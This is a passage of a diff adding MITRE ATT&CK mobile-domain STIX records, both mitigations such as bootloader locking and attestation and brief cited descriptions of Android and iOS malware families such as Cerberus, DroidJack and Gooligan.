"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--8ccd428d-39da-4e8f-a55b-d48ea1d56e58", + "type": "course-of-action", + "created": "2017-10-25T14:48:49.554Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1003", + "external_id": "M1003" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Lock Bootloader", + "description": "On devices that provide the capability to unlock the bootloader (hence allowing any operating system code to be flashed onto the device), perform periodic checks to ensure that the bootloader is locked.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "type": "course-of-action", + "created": "2019-10-18T12:51:36.488Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1001", + "url": "https://attack.mitre.org/mitigations/M1001" + } + ], + "modified": "2019-10-18T14:56:15.631Z", + "name": "Security Updates", + "description": "Install security updates in response to discovered vulnerabilities.\n\nPurchase devices with a vendor and/or mobile carrier commitment to provide security updates in a prompt manner for a set period of time.\n\nDecommission devices that will no longer receive security updates.\n\nLimit or block access to enterprise resources from devices that have not installed recent security updates.\n\nOn Android devices, access can be controlled based on each device's security patch level. On iOS devices, access can be controlled based on the iOS version.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433", + "type": "course-of-action", + "created": "2017-10-25T14:48:52.601Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1010", + "external_id": "M1010" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Deploy Compromised Device Detection Method", + "description": "A variety of methods exist that can be used to enable enterprises to identify compromised (e.g. rooted/jailbroken) devices, whether using security mechanisms built directly into the device, third-party mobile security applications, enterprise mobility management (EMM)/mobile device management (MDM) capabilities, or other methods. Some methods may be trivial to evade while others may be more sophisticated.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--e829ee51-1caf-4665-ba15-7f8979634124", + "type": "course-of-action", + "created": "2017-10-25T14:48:50.181Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1014", + "external_id": "M1014" + }, + { + "source_name": "CSRIC5-WG10-FinalReport", + "description": "Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. Retrieved May 24, 2017.", + "url": "https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Interconnection Filtering", + "description": "In order to mitigate Signaling System 7 (SS7) exploitation, the Communications, Security, Reliability, and Interoperability Council (CSRIC) describes filtering interconnections between network operators to block inappropriate requests (Citation: CSRIC5-WG10-FinalReport).", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "course-of-action", + "id": "course-of-action--e944670c-d03a-4e93-a21c-b3d4c53ec4c9", + "created": "2017-10-25T14:48:51.365Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1007", + "url": "https://attack.mitre.org/mitigations/M1007" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "Warn device users not to accept requests to grant Device Administrator access to applications without good reason.\n\nAdditionally, application vetting should include a check on whether the application requests Device Administrator access. Applications that do request Device Administrator access should be carefully scrutinized and only allowed to be used if a valid reason exists.", + "modified": "2022-04-06T14:47:19.714Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Caution with Device Administrator Access", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "type": "course-of-action", + "created": "2019-10-18T12:50:35.335Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1002", + "url": "https://attack.mitre.org/mitigations/M1002" + } + ], + "modified": "2019-10-18T14:52:53.019Z", + "name": "Attestation", + "description": "Enable remote attestation capabilities when available (such as Android SafetyNet or Samsung Knox TIMA Attestation) and prohibit devices that fail the attestation from accessing enterprise resources.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "CarbonSteal" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "type": "malware", + "created": "2020-11-10T16:50:38.917Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0529", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0529" + }, + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2021-09-20T13:54:19.819Z", + "name": "CarbonSteal", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) is one of a family of four surveillanceware tools that share a common C2 infrastructure. [CarbonSteal](https://attack.mitre.org/software/S0529) primarily deals with audio surveillance. (Citation: Lookout Uyghur Campaign)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_aliases": [ + "Cerberus" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "type": "malware", + "created": "2020-06-26T15:32:24.569Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0480", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0480" + }, + { + "source_name": "Threat Fabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020." + } + ], + "modified": "2020-09-11T15:43:49.079Z", + "name": "Cerberus", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) is a banking trojan whose usage can be rented on underground forums and marketplaces. Prior to being available to rent, the authors of [Cerberus](https://attack.mitre.org/software/S0480) claim was used in private operations for two years.(Citation: Threat Fabric Cerberus)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "DroidJack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--05c4f87c-be8f-46ea-8d9a-2a0aad8f52c1", + "created": "2017-10-25T14:48:40.571Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0320", + "url": "https://attack.mitre.org/software/S0320" + }, + { + "source_name": "DroidJack", + "description": "(Citation: Zscaler-SuperMarioRun) (Citation: Proofpoint-Droidjack)" + }, + { + "source_name": "Proofpoint-Droidjack", + "url": "https://www.proofpoint.com/us/threat-insight/post/droidjack-uses-side-load-backdoored-pokemon-go-android-app", + "description": "Proofpoint. (2016, July 7). DroidJack Uses Side-Load…It's Super Effective! Backdoored Pokemon GO Android App Found. Retrieved January 20, 2017." + }, + { + "source_name": "Zscaler-SuperMarioRun", + "url": "https://www.zscaler.com/blogs/security-research/super-mario-run-malware-2-droidjack-rat", + "description": "Viral Gandhi. (2017, January 12). Super Mario Run Malware #2 – DroidJack RAT. Retrieved January 20, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[DroidJack](https://attack.mitre.org/software/S0320) is an Android remote access tool that has been observed posing as legitimate applications including the Super Mario Run and Pokemon GO games. (Citation: Zscaler-SuperMarioRun) (Citation: Proofpoint-Droidjack)", + "modified": "2022-05-20T17:13:16.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "DroidJack", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Rotexy" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "type": "malware", + "created": "2019-09-23T13:36:07.816Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0411", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0411" + }, + { + "source_name": "securelist rotexy 2018", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019." + } + ], + "modified": "2020-09-11T15:53:38.216Z", + "name": "Rotexy", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) is an Android banking malware that has evolved over several years. It was originally an SMS spyware Trojan first spotted in October 2014, and since then has evolved to contain more features, including ransomware functionality.(Citation: securelist rotexy 2018)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Stealth Mango", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) is Android malware that has reportedly been used to successfully compromise the mobile devices of government officials, members of the military, medical professionals, and civilians. The iOS malware known as [Tangelo](https://attack.mitre.org/software/S0329) is believed to be from the same developer. (Citation: Lookout-StealthMango)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Stealth Mango" + ], + "type": "malware", + "id": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0328", + "external_id": "S0328" + }, + { + "source_name": "Stealth Mango", + "description": "(Citation: Lookout-StealthMango)" + }, + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Allwinner", + "description": "[Allwinner](https://attack.mitre.org/software/S0319) is a company that supplies processors used in Android tablets and other devices. A Linux kernel distributed by [Allwinner](https://attack.mitre.org/software/S0319) for use on these devices reportedly contained a backdoor. (Citation: HackerNews-Allwinner)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--08784a9d-09e9-4dce-a839-9612398214e8", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0319", + "external_id": "S0319" + }, + { + "source_name": "Allwinner", + "description": "(Citation: HackerNews-Allwinner)" + }, + { + "source_name": "HackerNews-Allwinner", + "description": "Mohit Kumar. (2016, May 11). Kernel Backdoor found in Gadgets Powered by Popular Chinese ARM Maker. Retrieved September 18, 2018.", + "url": "https://thehackernews.com/2016/05/android-kernal-exploit.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "GoldenEagle" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "type": "malware", + "created": "2020-12-24T22:04:27.667Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0551", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0551" + }, + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2021-03-25T16:20:28.165Z", + "name": "GoldenEagle", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) is a piece of Android malware that has been used in targeting of Uyghurs, Muslims, Tibetans, individuals in Turkey, and individuals in China. Samples have been found as early as 2012.(Citation: Lookout Uyghur Campaign)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-21T18:53:30.817Z", + "name": "Bread", + "description": "[Bread](https://attack.mitre.org/software/S0432) was a large-scale billing fraud malware family known for employing many different cloaking and obfuscation techniques in an attempt to continuously evade Google Play Store’s malware detection. 1,700 unique Bread apps were detected and removed from the Google Play Store before being downloaded by users.(Citation: Google Bread)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_contributors": [ + "Sergey Persikov, Check Point", + "Jonathan Shimonovich, Check Point", + "Aviran Hazum, Check Point" + ], + "x_mitre_aliases": [ + "Bread", + "Joker" + ], + "type": "malware", + "id": "malware--108b2817-bc01-404e-8e1b-8cdeec846326", + "created": "2020-05-04T14:04:55.823Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0432", + "external_id": "S0432" + }, + { + "source_name": "Joker", + "description": "(Citation: Google Bread)" + }, + { + "source_name": "Google Bread", + "description": "A. Guertin, V. Kotov, Android Security & Privacy Team. (2020, January 9). PHA Family Highlights: Bread (and Friends) . Retrieved April 27, 2020.", + "url": "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Judy", + "description": "[Judy](https://attack.mitre.org/software/S0325) is auto-clicking adware that was distributed through multiple apps in the Google Play Store. (Citation: CheckPoint-Judy)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--172444ab-97fc-4d94-b142-179452bfb760", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0325", + "external_id": "S0325" + }, + { + "source_name": "Judy", + "description": "(Citation: CheckPoint-Judy)" + }, + { + "source_name": "CheckPoint-Judy", + "description": "CheckPoint. (2017, May 25). The Judy Malware: Possibly the largest malware campaign found on Google Play. Retrieved September 18, 2018.", + "url": "https://blog.checkpoint.com/2017/05/25/judy-malware-possibly-largest-malware-campaign-found-google-play/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "OldBoot", + "description": "[OldBoot](https://attack.mitre.org/software/S0285) is an Android malware family. (Citation: HackerNews-OldBoot)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--2074b2ad-612e-4758-adce-7901c1b49bbc", + "created": "2017-10-25T14:48:45.155Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0285", + "external_id": "S0285" + }, + { + "source_name": "OldBoot", + "description": "(Citation: HackerNews-OldBoot)" + }, + { + "source_name": "HackerNews-OldBoot", + "description": "Sudhir K Bansal. (2014, January 28). First widely distributed Android bootkit Malware infects more than 350,000 Devices. Retrieved December 21, 2016.", + "url": "http://thehackernews.com/2014/01/first-widely-distributed-android.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Gooligan", + "description": "[Gooligan](https://attack.mitre.org/software/S0290) is a malware family that runs privilege escalation exploits on Android devices and then uses its escalated privileges to steal authentication tokens that can be used to access data from many Google applications. [Gooligan](https://attack.mitre.org/software/S0290) has been described as part of the Ghost Push Android malware family. (Citation: Gooligan Citation) (Citation: Ludwig-GhostPush) (Citation: Lookout-Gooligan)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Gooligan", + "Ghost Push" + ], + "type": "malware", + "id": "malware--20d56cd6-8dff-4871-9889-d32d254816de", + "created": "2017-10-25T14:48:43.242Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0290", + "external_id": "S0290" + }, + { + "source_name": "Gooligan", + "description": "(Citation: Gooligan Citation) (Citation: Ludwig-GhostPush) (Citation: Lookout-Gooligan)" + }, + { + "source_name": "Ghost Push", + "description": "Gooligan has been described as being part of the Ghost Push Android malware family. (Citation: Ludwig-GhostPush) (Citation: Lookout-Gooligan)" + }, + { + "source_name": "Gooligan Citation", + "description": "Check Point Research Team. (2016, November 30). More Than 1 Million Google Accounts Breached by Gooligan. Retrieved December 12, 2016.", + "url": "http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/" + }, + { + "source_name": "Ludwig-GhostPush", + "description": "Adrian Ludwig. (2016, November 29). The fight against Ghost Push continues. Retrieved December 12, 2016.", + "url": "https://plus.google.com/+AdrianLudwig/posts/GXzJ8vaAFsi" + }, + { + "source_name": "Lookout-Gooligan", + "description": "Lookout. (2016, December 1). Ghost Push and Gooligan: One and the same. Retrieved December 12, 2016.", + "url": "https://blog.lookout.com/blog/2016/12/01/ghost-push-gooligan/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "SpyNote RAT", + "description": "[SpyNote RAT](https://attack.mitre.org/software/S0305) (Remote Access Trojan) is a family of malicious Android apps. The [SpyNote RAT](https://attack.mitre.org/software/S0305) builder tool can be used to develop malicious apps with the malware's functionality. (Citation: Zscaler-SpyNote)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "SpyNote RAT" + ], + "type": "malware", + "id": "malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23", + "created": "2017-10-25T14:48:45.794Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0305", + "external_id": "S0305" + }, + { + "source_name": "SpyNote RAT", + "description": "(Citation: Zscaler-SpyNote)" + }, + { + "source_name": "Zscaler-SpyNote", + "description": "Shivang Desai. (2017, January 23). SpyNote RAT posing as Netflix app. Retrieved January 26, 2017.", + "url": "https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Ohad Mana, Check Point", + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_aliases": [ + "TrickMo" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "type": "malware", + "created": "2020-04-24T17:46:31.111Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0427", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0427" + }, + { + "source_name": "SecurityIntelligence TrickMo", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020." + } + ], + "modified": "2020-09-11T15:57:37.561Z", + "name": "TrickMo", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) a 2FA bypass mobile banking trojan, most likely being distributed by [TrickBot](https://attack.mitre.org/software/S0266). [TrickMo](https://attack.mitre.org/software/S0427) has been primarily targeting users located in Germany.(Citation: SecurityIntelligence TrickMo)\n\n[TrickMo](https://attack.mitre.org/software/S0427) is designed to steal transaction authorization numbers (TANs), which are typically used as one-time passwords.(Citation: SecurityIntelligence TrickMo) ", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "INSOMNIA" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "type": "malware", + "created": "2020-06-02T14:32:31.461Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0463", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0463" + }, + { + "source_name": "Volexity Insomnia", + "url": "https://www.volexity.com/blog/2020/04/21/evil-eye-threat-actor-resurfaces-with-ios-exploit-and-updated-implant/", + "description": "A. Case, D. Lassalle, M. Meltzer, S. Koessel, et al.. (2020, April 21). Evil Eye Threat Actor Resurfaces with iOS Exploit and Updated Implant. Retrieved June 2, 2020." + } + ], + "modified": "2020-06-24T18:24:35.433Z", + "name": "INSOMNIA", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) is spyware that has been used by the group Evil Eye.(Citation: Volexity Insomnia)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Dvmap" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--22b596a6-d288-4409-8520-5f2846f85514", + "type": "malware", + "created": "2019-12-10T16:07:40.664Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0420", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0420" + }, + { + "description": "R. Unuchek. (2017, June 8). Dvmap: the first Android malware with code injection. Retrieved December 10, 2019.", + "url": "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/", + "source_name": "SecureList DVMap June 2017" + } + ], + "modified": "2020-01-22T22:17:23.015Z", + "name": "Dvmap", + "description": "[Dvmap](https://attack.mitre.org/software/S0420) is rooting malware that injects malicious code into system runtime libraries. It is credited with being the first malware that performs this type of code injection.(Citation: SecureList DVMap June 2017)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Zen" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--22faaa56-a8ac-4292-9be6-b571b255ee40", + "type": "malware", + "created": "2020-07-27T14:14:56.729Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0494", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0494" + }, + { + "source_name": "Google Security Zen", + "url": "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html", + "description": "Siewierski, L. (2019, January 11). PHA Family Highlights: Zen and its cousins . Retrieved July 27, 2020." + } + ], + "modified": "2020-08-11T14:23:15.002Z", + "name": "Zen", + "description": "[Zen](https://attack.mitre.org/software/S0494) is Android malware that was first seen in 2013.(Citation: Google Security Zen)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "NotCompatible", + "description": "[NotCompatible](https://attack.mitre.org/software/S0299) is an Android malware family that was used between at least 2014 and 2016. It has multiple variants that have become more sophisticated over time. 